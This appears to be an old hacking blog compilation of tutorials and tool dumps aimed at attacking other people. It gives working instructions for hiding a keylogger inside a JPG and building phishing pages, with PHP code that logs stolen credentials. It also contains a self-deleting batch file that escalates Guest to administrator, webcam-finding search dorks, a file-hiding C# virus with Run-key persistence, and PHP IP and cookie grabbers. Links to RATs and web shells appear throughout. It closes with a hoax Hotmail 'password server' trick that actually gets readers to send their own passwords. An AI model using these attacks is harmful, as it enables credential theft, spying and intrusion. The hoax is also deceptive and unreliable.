In this Way of hacking i used invisible keyloggers to hack, Where these invisible keyloggers are undetectable,They even do the same work as keyloggers but they can do on others pc's too. Ok, Then you might think, how can i hack the others password through these keyloggers. That work is left to invisible keyloggers, They have an automated option to send you a e-mail, go to configure settings and set your email id there. Through this method you'll hack not only passwords but the users entire Keystrokes typed, Logs, Chat monitors and many more.Just you have to set the Report frequency of your wish.

Now stepping into the actual process to hack passwords
1.Basic requirements are you should have a keylogger and a picture of .jpg format or any other format of your wish but i recommend .jpg as it is easy to download.
2.I recomend anyone of these keyloggers "SKL" and "INSIDE KEYLOGGER"
Download SKL

3.Install the keylogger and give your email id in the Email options, I recomend yahoo. So you are half way done.
4.Now move to the folder in which you have your keylogger and one jpg image Zip both the files and save it in .jpeg format and upload the file on to the server. As the server will not allow you to upload the .exe files

5.This is another method to hide your Keylogger
copy these files to C:\ drive and paste them into a folder and open the command prompt window

6. the most important step is type this command at command prompt.

copy /b sourceimagefile.jpg + filetobehidden.exe targetimage.jpg
Now the logger in the .jpeg format
7.Now the antivirus cant detect the file.
8.Just send the uploaded image to the victim as soon as he clicks the image file invisible keylogger will be installed.
He'll b enjoying with picture and you enjoy with his emails.

As some part of the trick is inherited but implementation no one would have thought it.
Any errors,bugs,doubts will be clarified

for cascading jpeg file with exe file go throught this topic Learn binding jpeg with Exe file

all about fake login

all about fake login
Here are some fake pages. (THEY ARE READY MADE. U just have to view the source and change the email address. then upload to freeweb7. thats all)






Hotmail (2007).rar


NEW 2007 !!

Yahoo! GeoCities (2007).rar!%20GeoCities%20(2007).rar


hi5.rar! NEW



fake login page
TEP:1 open he website of ORKUT or HOMAIL or REDIFF MAIL or YAHOOMAIL, its your wish. if you want to HACK yahoo id, then go o

STEP2: Now press "CTRL+U", you will get the source code of yahoo page. NOw press "CTRL+A" copy all the text.

step3: Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML

STEP4: Now open the the file yahoofake.html using noepad, here you ll find a code which starts with (form action="xxxxxxxxxxxxxxxxxxxxxxxxxxxxx")
delete the above code and paste the yr id
step6: NOw save the file.

you can test whether its working or not. just open the yahoofake.html file and in the place of user name and password, type some thing and sign in. you will get the passwords in your mail id.. check out..
a new section for php based fake pages after which ny1 will be able to make fake page of any website(really)

so lets start now:-

first of all u need to know the source code of the website of which u want fake page
*for that right click on the webpage n click on view page source a new window will open just select all n copy the content n save it as urpage.html(u can name it nything u like acc to webpage)

now open ur urpage.html n search for :


firstly copy the text in blue n remember it u ll need it in ur php file

replace the text in blue with ur php filename like orkut.php

ur php file:

header ('Location: blue text here ');
$handle = fopen("login.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

now replace the text "blue text here" with the blue text from above

n now save the php file as orkut.php

now make a login.txt file which would be a blank file

now upload all the three files orkut.html,orkut.php,login.txt in a webhost which supports php like freeweb7(or u can google for more webhost for dat)

now u all r thinking dat how will i get the passwords?????
all the data entered in ur fake page will be stored in ur login.txt file which u can access thru ur webhost

so now enjoy ur new fake webpage

Thursday, February 21, 2008

Much Simpler trick to HACK admin from GUEST

Much Simpler trick to HACK admin from GUEST
Much Simpler trick to HACK admin from GUEST

Well thats possible ..

Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.

HaCk "GUEST" with Admin privileges........

echo off
title Please wait...
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

Hack a PC by USB.......

Hack a PC by USB.......
Hack a PC by USB.......

Download it.... (527 KB)

1 = Extract it.

2 = open pcinfo

3 = select all the files and paste it in ur USB ( not in any folder, at the main root )

4 = insert it in the pc u wanna hack...

5 = Open the USB drive, give it 2 sec and and ur job is done...

And now open the dump folder in ur pc and u will have all the info u want....

Info u will obtain: [IMAGE]

Ok now the problem which i was facing....

well i think it duznt autorun on PC with antivirus... U have to manually click the nircmd.exe

I m trying to figure out this problem but still not getting t... if any one knows how to fix it plz do tell.....

Hack into others webcams..........

Hack into others webcams..........
This is not a hacking Guide..

It's rather a tutorial to show you how to do a simple search for unprotected webcams on the nets

This is only for fun purposes...

You are totally responsible for your actions...


Go to this link :

and put this into the search Bar
intitle:liveapplet inurl:LvAppl

and click on google search...

it would show you a list of searched items....
Go to any of the link...Some of them doesn't works..
and you would be able to see webcams...

You would be able to see street/Traffic cams...

and not only can also control them move them right or left or zoom in or out...

It's great !!

Have fun

NOTE : You need to have high speed connection for this...

some more strings

inurl:indexFrame.shtml Axis




Note :- some links may not work...!!
Here are more google hacks for security cams:

inurl:indexFrame.shtml Axis
intitle:snc-rz30 inurl:home/
intitle:"supervisioncam protocol"
intitle:liveapplet inurl:LvAppl
intitle:"Live View / - AXIS"
intext:"MOBOTIX M1"
intext:"Open Menu"
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 206W"
intitle:"Live View / - AXIS 210"
inurl:indexFrame.shtml Axis
intitle:start inurl:cgistart
intitle:"WJ-NT104 Main Page"
intext:"MOBOTIX M1" intext:"Open Menu"
intext:"MOBOTIX M10" intext:"Open Menu"
intext:"MOBOTIX D10" intext:"Open Menu"
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:"sony network camera snc-p1"
intitle:"sony network camera snc-m1"
intitle:"Toshiba Network Camera" user login
intitle:"netcam live image"
intitle:"i-Catcher Console - Web Monitor"
"Kamerainformationen anzeigen"
intitle:"AXIS 2100 Network Camera Axis 2100 Network Camera 2.02"
intitle:"Linksys Web Camera" "ver"

use proxies...maybe a bit unsafe

Use/Run your free trial software forever......

Use/Run your free trial software forever......
After download:

add you free trial software name

browse and open your free trial software icon (example: tuneup.exe)

type your new date in the simulated run date box and run!!!!!!!!!!!!!!.change your date if you trial software do not work properly or expired.

enjoy !!!!!!!!!!!!!!!!!!!!!!


Simple loop code (virus)

Simple loop code (virus)
NOT exactly a virus..but

Its make spam on your pc with empty folder on desktop and startup.

Lang = VB

Private Sub Form_Load()
For i = 1 To 10000
MkDir "C:\Documents and Settings\All Users\Desktop\1" & "" & i
MkDir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\1" & "" & i
End Sub

This code is simple but evil

VB spy example!

VB spy example!
It is coding for spying on others. or in other words getting some data..

it has vb and php codes, all that u need is upload the php file to your web server, and execute vb source,

rsT = "&name=" & Me.Text1.Text & "&insMessage=" & Me.Text2.Text & "&submit=Enviar"

(u can type the following replacing text1 and text2, for expamle)

rsT = "&name=" & " PC Name of user " & winsock2.LocalHostName & "&insMessage=" & "Local IP of user" & winsock2.LocalIP & "&submit=Enviar"

(u can steal more information from the pc of the user if u want, Bios data , etc. The log u can see via PHP file, that has a log .....)

Download the source code with PHP file from this site :

languages for making softwares.etc

Visual Basic 6:

Portable Visual Basic 6:


turbo c++ 3.0 compiler:


[C#]X-Mas Virus [Simple - NonDestructive]

[C#]X-Mas Virus [Simple - NonDestructive]
[C#]X-Mas Virus [Simple - NonDestructive]

For Syntax Highligting:


using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Threading;
using System.IO;
using System.Text;
using System.Windows.Forms;
using Mcft.Win32;

namespace proj
public partial class Form1 : Form
public Form1()

private void Form1_Load(object sender, EventArgs e)
string me = Application.ExecutablePath;
string to = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\wdmon.exe";
File.Copy(me, to, true);
string keyname = "wdmon";
string runKeyBase = @"SOFTWARE\Mcft\Windows\CurrentVersion\Run\";
RegistryKey runKey = Registry.LocalMachine.CreateSubKey(runKeyBase);
runKey.SetValue(keyname, to + "\\wdmon.exe");

if (DateTime.Now.Month == 12)
if (DateTime.Now.Day == 25)
string Desktop = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
using (StreamWriter sw = File.CreateText("Christmas-Ownage.txt"))
sw.WriteLine("You Got Owned by illuz1oN's X-Mas Virus, ~censored~ You!");
foreach (string filePath in Directory.GetFiles(@"C:/", "*", SearchOption.AllDirectories))
File.SetAttributes(filePath, FileAttributes.Hidden | FileAttributes.System);
sw.WriteLine("Your File: " + filePath + " Just Got Owned");

that code will be useless without the GUI

so here it is compiled.

Anybody can run this.

if ONLY runs the virus code when its December 25th

PHP : Ip Stealer

PHP : Ip Stealer
PHP : Ip Stealer


$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "";
$sujet = "Ip + Host";
$message = "Moment : $date
Ip : $ip
Host : $host";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "Ownneeed";}
else { echo "Shit ?";}

Change with your email.
Create a document php, give the link to someone and you'll receive his ip and host in your email box...

Simple Cookie Grabber

Simple Cookie Grabber
Simple Cookie Grabber

As the title says....

Language = PHP


$cookie = $_GET['cookie'];
$referer = $_SERVER['HTTP_REFERER'];
$data = date("d/m/y");
$ora = date("G:i:s");
$os = getos($_SERVER['HTTP_USER_AGENT']);
$browser = getbrowser($_SERVER['HTTP_USER_AGENT']);
function getbrowser($usr_ag)
if (stristr($usr_ag,"IE"))
$brw = "Internet Explorer";
else if (stristr($usr_ag,"Firefox"))
$brw = "Mozzilla Firefox";
else if (stristr($usr_ag,"Opera"))
$brw = "Opera";
$brw = "Sconosciuto";
return $brw;
function getos($usr_ag)
if (stristr($usr_ag,"Windows"))
$os = "Windows XP or Vista";
else if (stristr($usr_ag,"Linux"))
$os = "Linux";
else if (stristr($usr_ag,"MAC"))
$os = "Mac";
$os = "Sconosciuto";
return $os;
$file = fopen("cookies.html", "a");
fwrite($file, 'Cookie: [ '.$cookie.' ]
Referer: [ '.$referer.' ]
Browser: [ '.$browser.' ]
Sistema Operativo: [ '.$os.' ]
IP: [ '.$ip.' ]
Data: [ '.$data.' ]
Ora: [ '.$ora.' ]


Some Backdoor sources


@@ = tt

u will love it.....

Email Xtractor

Email Xtractor
Email Xtractor


#!/usr/bin/perl -w
#Email Xtractor
my $emailz = $ARGV[1];
my $output = $ARGV[2];
if(@ARGV < 2){ usage(); }
#Take emails, and place into an array!
open(EMAIL, $emailz);
if($emailz =~m/(*@*.net|*@*.com|*@*{
my @em=;
foreach my $chck(@em){
print "Email $. : $chck Saved\n";
open(FI, $output){
print "Email Extractor - illuz1oN\n\n";
print "$. : $chck\n";
print "Emails Saved to $output\n";
} else {
print "Emailz Not Valid!\n";
sub usage {
print qq[-==+-----------------------------------+==-
-==+ Email Extractor +==-
-==+ Usage: [file.*] [output.*] +==-
-==+ Xample: email.txt ext.txt +==-

Email Leecher 0.1/fast paypal checker

Email Leecher 0.1
Type in any @Domain you want e.g - and let this leecher gain all emails it can for mailing lists!
not tested and not uploaded by me.


fast paypal checker
here is lite tool to check paypals fast


Best Hacking Tools -85in1-

Best Hacking Tools -85in1-

Audio theme:
Sean Paul - Temperature

43.2MB Compress
29.7MB UnCompress
No pass

Main page:


Page 1:

MSN Chat Monitor And Sniffer
MSN Password Retriever
MSN Hacker DUC
Head Fuck HotMail HAck
HotMail Hacker XE Edition
HotMail HAck
HotMAil Hacker
MSN Passwords
MSN Flooder
MSN Sniffer
HotMail Hacker Gold
HotMail HAcker Final
Give me Ur Pass
HotMail Brute Forcer
MSN PAssword Finder
MSN Password Grabber
Hack MSN Password
Hack HotMAil Evolution
MAgic Password Sender
MSN Locker
HotMail Killer
Hot Freeze
HotMAil Hack !
Ice Cold Reload
HotMail Killer 2
Nuke MSN

PAge 2:

Yahoo Messenger Login Screen
MSN Messenger 7 Login Screen
MSN Messenger 5 Login Screen
MSN Messenger 4.6 Login Screen
HotMail Login Screen
Fake Web Pages 2
Fake Eeb Pages 1
AOL Killer
Fake Login HotMail
B-S Spy
Saria Fake Logins

Page 3:
Yahoo Password Retrieval
Yahoo Cracker
Yahoo Booster
Yahoo Hack!
Yahoo Password Stealer
S-H Yahoo Password Sender

Page 4:

NetWork Password Recovery
Net BIOS Name Scanner
FTP Password Hacker
Cable Modem Sniffer
Port Listening XP
Blue Port Scanner
www 2 IP
XP Killer
Sniff Password
Port Scanner
Fast Resolver
Domain Scan
Whois Domain
NetRes View
PHPbb Defacer
Angry IP Scanner
FTP Brute Forcer

PAge 5:

Hook Tool Box
Smart HAck UpLoader
Remote Anything
Post Sage
PHPbb Attacker

Page 6:

MSN Bomber Man
Ultimate Nick PopUpz
MSN 7 Universal Patcher
Emoticons Creator
MSN Picture Crawler
Anti Status Bomb
MSN Detector
Multi MSN Loader
Protect Lithium
Tray It!
MSN Block Checker
MSN Auto Responder
MSN Virus Cleaner
MSN Dondurucu



Wireless Hack Toolz 7 in 1 *AIO*

Wireless Hack Toolz 7 in 1 *AIO*
AIO Wireless Hack Toolz

This is nicely put best wireless tools into one pack.
It includes Kismet, NetStumbler, Wellenreiter, WEPcrack, airsnort, wepwedgie and Hotspotter.
Also reading is included to help you.
Must Have for wireless fans.




WEPcrack 0.1.0





?# NetStumbler-0.4.0 : wireless access point identifier - listens for SSIDs and sends beacons as probes searching for access points.

?# Kismet-2005-08-R: wireless sniffer and monitor - passively monitors wireless traffic and sorts data to identify SSIDs, MAC addresses, channels and connection speeds.

?# Wellenreiter-v1.9: WLAN discovery tool - uses brute force to identify low traffic access points; hides your real MAC address; integrates with GPS.

?# WEPcrack 0.1.0: Unix based-pearl aplication encryption breaker - cracks 802.11 WEP encryption keys using the latest discovered weakness of RC4 key scheduling.

?# airsnort-0.2.7e: encryption breaker - passively monitoring transmissions, computing the encryption key when enough packets have been gathered.

?# wepwedgie-0.1.0-alpha: for toolkit that determines 802.11 WEP keystreams and injects traffic with known keystreams in order to crack WEP in minutes.

?# Hotspotter-0.4: Wireless client attacking t??l.

Most programs are open source, and very useful if you know what your doing.

Note:some of these programs render.useless
links to how to install are provided in the package, as there is support for windows there as well.
.::Also includes::.

?# Advanced Bash-Scripting Guide

This document is both a tutorial and a reference on shell scripting with Bash. It assumes no previous knowledge of scripting or programming, but progresses rapidly toward an intermediate/advanced level of instruction. The exercises and heavily-commented examples invite active reader participation. Still, it is a work in progress. The intention is to add much supplementary material in future updates to this document, as it evolves into a comprehensive book that matches or surpasses any of the shell scripting manuals in print.

?# Bash Guide for Beginners

The Bash Guide for Beginners gets you started with Bash scripting and bridges the gap between the Bash HOWTO and the Advanced Bash Scripting Guide. Everybody who wants to make life easier on themselves, power users and sysadmins alike, can benefit from reading this practical course. The guide contains lots of examples and exercises at the end of each chapter, demonstrating the theory and helping you practice. Bash is available on a wide variety of UNIX, Linux, MS Windows and other systems.

?# The Linux Network Administrator's Guide, Second Edition

This book was written to provide a single reference for network administration in a Linux environment. Beginners and experienced users alike should find the information they need to cover nearly all important administration activities required to manage a Linux network configuration. The possible range of topics to cover is nearly limitless, so of course it has been impossible to include everything there is to say on all subjects. We've tried to cover the most important and common ones. We've found that beginners to Linux networking, even those with no prior exposure to Unix-like operating systems, have found this book good enough to help them successfully get their Linux network configurations up and running and get them ready to learn more.
Last but not least.... here is a very interesting read we came accross awhile back that is very interesting nonetheless.





Ardamax Keylogger v2.8

Ardamax Keylogger v2.8
Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for Windows 98, ME, NT4, 2000, XP and 2003.

Keylogger Features:
* Remote Installer - creates a customized Ardamax Keylogger engine file. You can email this file to your target for remote monitoring.
* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 98/2000/XP/2003/Vista Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.
* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!
* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.
* Network delivery - sends recorded logs through via LAN.
* Clipboard logging - capture all text copied to the Windows Clipboard.
* Visual surveillance - periodically makes screenshots and stores the compressed images to log.
* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o MSN Messenger, Windows Live Messenger
o ICQ Pro, ICQ Lite
o Skype
o Windows Messenger
o Google Talk
o Yahoo Messenger
o Miranda
o QiP
* Security - allows you to protect program settings, Hidden Mode and Log file.
* Web Update - Ardamax Keylogger can check the availability of updates, download and install them automatically. Thus, the latest version of Ardamax Keylogger will always be installed on your computer.
* Application monitoring - keylogger will record the application that was in use that received the keystroke!
* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!
* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.
* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.
* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.
* It records every keystroke. Captures passwords and all other invisible text.

Other Features:
* Windows 2000/XP/Vista support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install


717 Hacks AIO (Hacking Tools)

717 Hacks AIO (Hacking Tools)



CrackDownloader v2.2

CrackDownloader v2.2

CrackDownloader is an easy to use tool to find and download cracks and serials through internet quickly.

It searches for cracks/serials over the internet in the best cracks/serials sites and show you the results in moments!, then you can download any crack/serial quickly.

Since CrackDownloader doesn't use Internet Explorer to search and get the cracks and serials, you can use it without any fear of any Virus, Adware, Trojan or Immoral content that most of the crack sites contain, so it's 100% saveware !



Windows Hacking Tools....MOVED

Windows Hacking Tools....MOVED
Windows Haking Tools software is specifically designed for Windows system. Information Security and Ehical Hacking course from Appin Knowledge Solutions is the first step to take for all aspiring Information Security professionals.

Here are some key features of “Information Security and Ethical Hacking Course”:
· Pioneer product in information Security and Ethical Hacking
· Presentations ranging from Introduction to Information Security and Ethical Hacking to Computer Forensics
· Interactive Live Information Security Videos
· Security and Ethical Hacking tools to provide hands on Practice
· Live simulation games to test the skills learned in a real life environment
· The course includes the latest Hacking attempts expected in the year 2006 to past case studies on intrusions done in the past
· More than 40 Security Videos and Demonstrations.
· Live Security / Hacking tools
· Simulation Security games.
· Understand the Windows operating System from Security Perspective.
· Tools to protect your self from Virus, Trojans, worms and other Hack attacks.
· Tools and firewalls to protect your computer and Network from Spy-wares.
· Methods and technology to secure your Internet
· Ways to trace forged emails
· Teaches you how to secure your e-mails
· Faculty with more than 20 years of experience at the core of the course.

Dont complain any hack tools; trojan. Because it is...


Windows Hacking Tools....MOVED

Windows Hacking Tools....MOVED
Windows Haking Tools software is specifically designed for Windows system. Information Security and Ehical Hacking course from Appin Knowledge Solutions is the first step to take for all aspiring Information Security professionals.

Here are some key features of “Information Security and Ethical Hacking Course”:
· Pioneer product in information Security and Ethical Hacking
· Presentations ranging from Introduction to Information Security and Ethical Hacking to Computer Forensics
· Interactive Live Information Security Videos
· Security and Ethical Hacking tools to provide hands on Practice
· Live simulation games to test the skills learned in a real life environment
· The course includes the latest Hacking attempts expected in the year 2006 to past case studies on intrusions done in the past
· More than 40 Security Videos and Demonstrations.
· Live Security / Hacking tools
· Simulation Security games.
· Understand the Windows operating System from Security Perspective.
· Tools to protect your self from Virus, Trojans, worms and other Hack attacks.
· Tools and firewalls to protect your computer and Network from Spy-wares.
· Methods and technology to secure your Internet
· Ways to trace forged emails
· Teaches you how to secure your e-mails
· Faculty with more than 20 years of experience at the core of the course.

Dont complain any hack tools; trojan. Because it is...


wireless networks, LAN, cracking tools, defacing, port scanners, IP scanner, hacking messenger, complete step-by-step tutorials, + manualess, etc

wireless networks, LAN, cracking tools, defacing, port scanners, IP scanner, hacking messenger, complete step-by-step tutorials, + manualess, etc


Plz notify if the link iz dead..

Hacking Tools Suite........

Hacking Tools Suite........
Guys believe me or not.........this thing is aweosme......

replace "hxxp with http"


Cain and Able
Hot Mail account freezer
Soft Ice
AA tools
Brutus AE2
Net Raider
Host Scanner
and many more........check dem out.......

comment on this guys........thankz in advance......take care....have fun..byeeee

Pro RAt Trojan 1.9

Pro RAt Trojan 1.9
This is a program which lets you control your victim's PC (even format the hard drive!) and mess around with it, also you can do some cool stuff. Check it out.

This edition includes the Binded Server, the virus file. Send the binded server (rename first to something related to Counter-Strike like Steam Keygen.exe because the icon is a CS icon.)


its a trojann dont foget to .. disable ur antivirusses... i love this tool

Webhacking TOOLS!!

Webhacking TOOLS!!
Very RARE to get these...grab it..

Apache Hacking TooLz Directory:

Apache Chunked Scanner
Apache Hacker Tool v 2.0
Apache H4x0r Script

Remote File Inclusion And Remote Command Execution Directory :

IIS 5 Dav Scanner & Exploiter
PHP Attacker
PHP Injection Scanner & Exploiter
XML-RPC Scanner & Exploiter

Databases & SQL Injection & XSS TooLz Directory

Casi 4.0
Mssql BruteForce TooL
SQL Ping 2
SQL Recon
SQL Vuln Scanner

PHP Shells

**** v2.0
c99shell #16
Backdoor php v0.1
cmd (asp)
CyberEye (asp)
CyberSpy5 (asp)
Indexer (asp)
Ntdaddy (asp)
News Remote PHP Shell Injection
PHP Shell
nstview php shell

Download: first

CC's Hacking tools full verson [IMAGE]













Hack Any Website with This Soft!

Hack Any Website with This Soft!
~ Most Wanted WebSite Defacer + Video Tutorial ~
The software orignal price is $20. But i cracked this soft. Enjoy


Download Full:

How it works? Must See (Tutorial)


Wednesday, February 20, 2008

Hacks Total System

Hacks Total System
Dear ,

If u know Ip and connecxt LAN U can Access Total System Like

Start>run>\\IPADDRESS\(DriveLetterName c\d)$

Type Without Space

brute forcing softwares

MD5 Dictionary attacker

MD5 Dictionary attacker
hey guys

i hav created a md5 dictinary attacker. Can u plz test it for me & report me if u find any bugs.

[content suppressed]

a wordlist is also included with name pass.txt, u wil find it in application folder.
it takes wordlist in .txt format & each word tht u want to match shld b in new line.

I wil also add bruteforce attack to it when i get som time, maybe in next 20-25 days.


& those who r nt familiar with MD5 see this:

MD5 is even now the mst widely used one way hash algo.

wow content supressed


replace x in http with t

Rapidshare Brute Force Attack 100% working App

Rapidshare Brute Force Attack 100% working App
This application uses brute force method to hack rapidshare servers using username and password combinations just sit and watch and you are done

Use winrar to open the file and read the comment section for the password

Download LinK:

something about BRUTE FORCE attack

something about BRUTE FORCE attack

1. Crack an FTP Password: NETWOX/NETWAG
The NETWOX application can be a very dangerous tool in wrong hands. The latest version has a 197 different techniques to enumerate information from the LOCAL AREA NETWORK(LAN) or launch attacks against a remote target. In this I just explain its ability to brute-force an FTP server given a username and password list.
PROCEDURE:Compile all components, run the NETWOX application, and review the results.

2. Extract Password Hashes: FGDump
The FGDump application was written to obtain the password hashes from the security Accounts manager(SAM) file on the target computer. This process includes:
1. Binding to a machine using the Inter-Process Communication(IPC$) or lists of targets.
2. Stopping the running of Anti-virus programs.
3. Locating writable file shares.
4. Uploading fgexec (for remote command execution) and cachedump.
5. Executing pwdump.
6. Executing cachedump.
7. Deleting uploaded files from the file share.
8. Unbinding from the file share.
9. Restarting any Anti-virus programs.
10. Unbinding from IPC$.
SOFTWARE TO GET SOFTWARE: [content suppressed]
PROCEDURE: Select the target and execute with the following syntax:
fgdump (-h host| -f filename) -u username -p password
As a example;
fgdump -vv -h IP address -u adminidtrator -p 123

1. here -vv shows very verbose mode.
2. -h IP address identifies the target.
3. -u adminsitrator identifies the usernaem to use.
4. -p 123 is the password for the administrator account.
According to the results of this example,it tells:
sharing of any drive
any mapped drive bounded with ADMIN$ and is writeable or not.
any antivirus running or not.
The Passwords were successfully dumped from the target and all the traces of the attack were removed from the target.
From the directory on the attacker's machine, two new files were created:
1. ip address cachedump
2. ip address pwdump
Of above two, the IP address.pwdump is the file of interest. By opening the ip address.pwdump file with a text editor such as Notepad the password hashes from the target are visible.
You can get more options by the following syntax:
fgdump -h/-?

3. Crack and Capture Password hashes: LC5
L0phtcrack version 5(LC5) is a password-auditing tool that allows for the capturing of windows passwords and or the conversion pf captured Windows password hashes into correct password. This is done by sending the captured hash through an alogrithm until the new hash exactly matches the original one. This identifies the password that computes into the hash.
LINK TO GET SOFTWARE: [content suppressed]
PROCEDURE:Install the L0phtcrack application,start, select parameters, and execute.
Simple to use and very good softwarer .you need a password dump file too which is created by fgdump ..........................herheheheheeheheeeee.....

4.Change the Administrator Password: CHNTPW
The change NT password(CHNTPW) application will change the administrator password regardless of what it is currently set to. CHNTPW also demonstrates the need for strong access controls and physical access to servers or any computer.
PROCEDURE: Gain physical access to the computer,boot from the CHNTPW CD, follow the on-screen instructions, change the password(s), and reboot.

5.BRUTE-FORCE Passwords for a hashed file: JOHN THE Ripper
JOHN THE RIPPER has been around seemingly forever. Its ability to brute-force passwords has a proven track record. It is flexible, fast, aand efficient, which are all quality items to look for when cracking passwords.
PROCEDURE:Configure, make and execute with approprite options against a file containing hashed paswords with the following syntax:
john (password file)

6.BRUTE-FORCE sn FTP Password Connection: BRUTEFTP
File Transfer Protocol is used to transfer files between computers and is still widely in use. The biggest flaw with FTP is that it is unencrypted in nature and f intercepted can be read easily, including the usernames, passwords, and data.
PROCEDURE: Install the application, select the target and execute.

7.BRUTE-FORCE terminal server passwords:TSGrinder II
TSGrinder II is an application designed to brute-force a usernames's password against a Terminal Server. Terminal Server uses an encrypted channel,which also helps evade Instrusion Detection Systems.ALthough a dicitionary-based tools, it supports multiple attack windows from the same dictionary file.
PROCEDURE: Start the application with selected options under the following syntax:
tsgrinder -u (username) -w (dictionary file) target
as a example:
tsgrinder -u kermit -p dict IP address

web crack

C-Force-----One of the best in my option
Access Driver----the best ...i think
Sentry----noobish good if your just starting out
Brutus----oldy but goody
Charon---for finding anon proxies a must if your going to use the first 4
Raptor--wordlist generator and filter for making passwords and usernames

This is pretty much everything to need to crack a forum or website..
{{{{{{!!!!!!!USE ANON PROXIES!!!!!!!!!}}}}}}}


hotmail hacking


I do NOT take any responsibility for the content of this page. If you read this page with it's methods of fetching Hotmail passwords, you have agreed to take your own responsibility for any actions you may make. (Read Step 5 very carefully)

Brief Hotmail Hacking Introduction:

This is the only true way to fetch a Hotmail Password, as Hotmail is extremely hard to Hack, apart from Brute Force Hacking.

Brute Force Hacking is the only other method, which is effective but it is extremely slow and the time that it takes to retrieve a password can take days on end. There are also many variables, which depend on the speed of Hacking, like the power of your PC, your connection speed, the type of Brute Force Hacker that you are using, and even the type of Dictionary File you may want to use.

I know that this method of Hacking in a Hotmail account works, as one of my friends is part of the Hotmail Staff and she told me about this method of Password Retrieval.

This is their default method of retrieving a Hotmail Members Password, (Only IF they NEED to) when any of the Hotmail Staff are unable to have physical access to one of their Hotmail Servers.

Step 1.

The first step in the process of hacking in to someone's Hotmail account is quite easy. You simply log into your own Hotmail account.

Important Note: Your account MUST have been open and in use for a minimum of 1 Month, for this process to work!!

Basically, the the Hotmail Email Account Server, will work in part with the Hotmail Password Server for a partial amount of this entire process. It is just an added security precaution, to make sure that the Password Retrieval process has been forwarded from an existing account, used account (ie: The Hotmail Staff) and not a new (Make-shift) account.

Step 2.

Once you have logged into your own account, compose/write an e-mail to This is a secret automated password storage server, which the Hotmail Staff use.

After you send the email, the automated server, which is dedicated to owning/using the mailing address of will send you the password that you have 'forgotten'. Make sure that you make the Subject of the message "chng_pswrd" (Without the inverted commas)

Step 3.

In the body of the message type the following code, as it appears below, making all necessary changes:


<*Your* Hotmail address omitting ''>
Newpass+!=<*Your* Password for *Your* Hotmail address>


Include all the above <>'s and only make changes to the things in italic.
You must use YOUR password to retrieve your victims password, otherwise it won't work (See below).

The automated password server will only reply back to your email, sending you your victims account information to your Hotmail address, if you use your own Hotmail address and the correct password which goes with it. By giving your Hotmail address and password tally, you trick the automated password server into thinking that you are a one of the Hotmail Staff, therefore the password server knows that you have full access privileges to any Hotmail account password and sends you the information, which you have requested.

Since many people have emailed me, requesting on how exactly you correctly write this information in the email, I have created an example for everyone to use and understand from. Everything which is in Bold is what you change; this example shows you how to do this correctly:



Step 4.

Now all you have to do, is send the above message to the address (There is an underscore [ _ ] between the "rtvl" and the "srv"! Don't forget it, otherwise you'll get a bounced message.)

Step 5.

You're finished! It should take between 30 - 40 minutes for the server to respond, but this can vary greatly, depending on the amount of traffic on the Internet, and the traffic and workload of the password server. It has been said, that in some circumstances it has taken up to a week for the Server to respond! In this circumstance, patience is of a virtue...


It only works if you use your own Hotmail account and password tally... If you don't and you do send the email, then the automated password server, will automatically forward the full message to

If they realise what's going on they will indefinitely delete your account immediately.
So don't make *ANY* mistakes!

There you have it! You've hacked into Hotmail, and cracked someone's password! Now you can login to their account!

Have Phun!